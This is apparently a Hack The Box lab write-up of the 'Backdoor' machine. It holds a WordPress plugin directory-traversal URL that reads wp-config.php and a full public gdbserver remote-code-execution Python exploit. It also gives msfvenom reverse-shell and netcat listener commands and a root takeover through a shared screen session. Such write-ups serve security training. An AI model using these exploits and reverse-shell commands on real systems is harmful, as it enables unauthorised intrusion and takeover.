Backdoor HTB Write-up| Backdoor hack the box Walkthrough | Backdoor.htb|10.10.11.125| backdoor.htb| Write Up : backdoor HTB

Aditya Chauhan
9 min readDec 7, 2021

Information gathering

First use nmap for port scanning

┌──(kali㉿kali)-[~]
└─$ nmap -A -sC -sV -sS -p- 10.10.11.125
Starting Nmap 7.91 ( https://nmap.org ) at 2021–11–30 02:16 EST
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.14% done
Nmap scan report for backdoor.htb (10.10.11.125)
Host is up (0.20s latency).
Not shown: 65417 closed ports, 115 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/30%OT=22%CT=1%CU=37705%PV=Y%DS=2%DC=T%G=Y%TM=61A5D5
OS:A1%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 204.20 ms 10.10.14.1
2 204.33 ms backdoor.htb (10.10.11.125)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1469.77 seconds

You can see from the above that the target machine uses WordPress 5.8.1 CMS as a service to build. so we use wpscan to scan all vulnerable plugins.

wpscan output

wpscan — url http://10.10.11.125 — enumerate -Ua 1 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.18

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database …
[i] Update completed.

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Tue Nov 30 02:29:55 2021

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| — http://codex.wordpress.org/XML-RPC_Pingback_API
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| — https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.11.125/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.11.125/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.11.125/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| — https://www.iplocation.net/defend-wordpress-from-ddos
| — https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8.1 identified (Insecure, released on 2021–09–09).
| Found By: Rss Generator (Passive Detection)
| — http://10.10.11.125/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| — http://10.10.11.125/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>

[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.11.125/wp-content/themes/twentyseventeen/
| Latest Version: 2.8 (up to date)
| Last Updated: 2021–07–22T00:00:00.000Z
| Readme: http://10.10.11.125/wp-content/themes/twentyseventeen/readme.txt
| Style URL: http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a f…
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| — http://10.10.11.125/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: ‘Version: 2.8’

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations — Time: 00:00:15 <========================================================================================> (358 / 358) 100.00% Time: 00:00:15
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations — Time: 00:01:50 <======================================================================================> (2575 / 2575) 100.00% Time: 00:01:50

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups — Time: 00:00:06 <=========================================================================================> (137 / 137) 100.00% Time: 00:00:06

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports — Time: 00:00:03 <===============================================================================================> (71 / 71) 100.00% Time: 00:00:03

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to “Plain” for those to be detected)
Brute Forcing Attachment IDs — Time: 00:00:04 <====================================================================================> (100 / 100) 100.00% Time: 00:00:04

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs — Time: 00:00:01 <==========================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| — http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov 30 02:32:37 2021
[+] Requests Done: 3311
[+] Cached Requests: 8
[+] Data Sent: 914.804 KB
[+] Data Received: 18.281 MB
[+] Memory used: 223.848 MB
[+] Elapsed time: 00:02:42

After scanning there is not a lot of useful information here, plugins and content are not scanned, but I know the administrator is the admin.

Look at the website content

next I try to find directory available on website .I use Dirb directory searching tool.

┌──(root💀kali)-[~]
└─# dirb http://10.10.11.125

— — — — — — — — -
DIRB v2.22
By The Dark Raver
— — — — — — — — -

START_TIME: Tue Nov 30 04:11:30 2021
URL_BASE: http://10.10.11.125/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

— — — — — — — — -

GENERATED WORDS: 4612

— — Scanning URL: http://10.10.11.125/ — —
+ http://10.10.11.125/index.php (CODE:301|SIZE:0)
+ http://10.10.11.125/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://10.10.11.125/wp-admin/
==> DIRECTORY: http://10.10.11.125/wp-content/
==> DIRECTORY: http://10.10.11.125/wp-includes/
+ http://10.10.11.125/xmlrpc.php (CODE:405|SIZE:42)

— — Entering directory: http://10.10.11.125/wp-admin/ — —
+ http://10.10.11.125/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-admin/css/
==> DIRECTORY: http://10.10.11.125/wp-admin/images/
==> DIRECTORY: http://10.10.11.125/wp-admin/includes/
+ http://10.10.11.125/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-admin/js/
==> DIRECTORY: http://10.10.11.125/wp-admin/maint/
==> DIRECTORY: http://10.10.11.125/wp-admin/network/
==> DIRECTORY: http://10.10.11.125/wp-admin/user/

— — Entering directory: http://10.10.11.125/wp-content/ — —
+ http://10.10.11.125/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://10.10.11.125/wp-content/plugins/

after directory search i found many directory so we check manually to every directory and find interesting on /wp-content/plugins

Only readme.txt has content, go in and take a look

Confirm that it is a plug-in, let’s go to exploit-db to search for vulnerabilities

https://www. exploit-db.com/exploits /39575

let us find a vulnerabilities Directory Traversal

http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

This is an arbitrary file download vulnerability, download a configuration file to see

Verify that the vulnerability exists and is exploitable, try logging in to the admin user with the database password . after try admin user with DB password I find DB password or admin password are different so I tried to enumerate port 1337 , find ruing service or server .

Use the LFI (Local File Inclusion) WordPress plugin for port 1337 reading, let’s try to

Just read the /proc/pid/cmdline file like this, where pid is a variable number. According to the test, the number range should be between 900–1000 . Important files in proc give information about running processes.

start attacking ….

Yes, you can see that there is a gdbserver service here. After testing, the service is set up on port 1337 and can be used

At the same time I found an interesting thing for linux privilege escalation

See, there is no getshell yet, it has already got everything from the roots, and no one is left.

user

Find exploit of gdbserver service REC

Step1 : First save the exploit locally (change Ip)

# Exploit Title: GNU gdbserver 9.2 — Remote Command Execution (RCE)
# Date: 2021–11–21
# Exploit Author: Roberto Gesteira Miñarro (7Rocky)
# Vendor Homepage: https://www.gnu.org/software/gdb/
# Software Link: https://www.gnu.org/software/gdb/download/
# Version: GNU gdbserver (Ubuntu 9.2–0ubuntu1~20.04) 9.2
# Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)

#!/usr/bin/env python3

import binascii
import socket
import struct
import sys

help = f’’’
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim’s gdbserver -> 10.10.11.125:1337
- Attacker’s listener -> 10.10.14.6:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 4444

3. Run the exploit:
$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
‘’’

def checksum(s: str) -> str:
res = sum(map(ord, s)) % 256
return f’{res:2x}’

def ack(sock):
sock.send(b’+’)

def send(sock, s: str) -> str:
sock.send(f’${s}#{checksum(s)}’.encode())
res = sock.recv(1024)
ack(sock)
return res.decode()

def exploit(sock, payload: str):
send(sock, ‘qSupported:multiprocess+;qRelocInsn+;qvCont+;’)
send(sock, ‘!’)

try:
res = send(sock, ‘vCont;s’)
data = res.split(‘;’)[2]
arch, pc = data.split(‘:’)
except Exception:
print(‘[!] ERROR: Unexpected response. Try again later’)
exit(1)

if arch == ‘10’:
print(‘[+] Found x64 arch’)
pc = binascii.unhexlify(pc[:pc.index(‘0*’)])
pc += b’\0' * (8 — len(pc))
addr = hex(struct.unpack(‘<Q’, pc)[0])[2:]
addr = ‘0’ * (16 — len(addr)) + addr
elif arch == ‘08’:
print(‘[+] Found x86 arch’)
pc = binascii.unhexlify(pc)
pc += b’\0' * (4 — len(pc))
addr = hex(struct.unpack(‘<I’, pc)[0])[2:]
addr = ‘0’ * (8 — len(addr)) + addr

hex_length = hex(len(payload))[2:]

print(‘[+] Sending payload’)
send(sock, f’M{addr},{hex_length}:{payload}’)
send(sock, ‘vCont;c’)

def main():
if len(sys.argv) < 3:
print(help)
exit(1)

ip, port = sys.argv[1].split(‘:’)
file = sys.argv[2]

try:
with open(file, ‘rb’) as f:
payload = f.read().hex()
except FileNotFoundError:
print(f’[!] ERROR: File {file} not found’)
exit(1)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip, int(port)))
print(‘[+] Connected to target. Preparing exploit’)
exploit(sock, payload)
print(‘[*] Pwned!! Check your listener’)

if __name__ == ‘__main_’:
main()

Step2 :

Then use msfvenom to generate a Trojan

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 PrependFork=true -o rev.bin

Step3 : on netcat listener on port 4444

nc -nlvp 4444

Step4 :

run exploit

┌──(kali㉿kali)-[~/Downloads]
└─$ python3 50539.py 10.10.11.125:1337 rev.bin
[+] Connected to target. Preparing exploit
[+] Found x64 arch
[+] Sending payload
[*] Pwned!! Check your listener

Then successfully bounce back to a shell

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444
listening on [any] 4444 …
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.125] 48584
id
uid=1000(user) gid=1000(user) groups=1000(user)
python3 -c “import pty;pty.spawn(‘/bin/bash’)”
user@Backdoor:/home/user$ cat user.txt
cat user.txt
28171exxxxxxxxxxxxxxxxxdbe

get user flag now trying to root

Root

find / -perm -4000 -ls 2>/dev/null
ps -ef | grep -i screen

SUID set on screen and there is session name root

export TERM=xterm
screen -x root/root

finally root

--

--

Aditya Chauhan

ISO 27001 LA | VAPT | Synack Red Teamer | HTB Dante | HTB RASTA | HTB Cybernetics | HTB Offshore | HTB APTLabs | Cyber Security Analyst | Security Researcher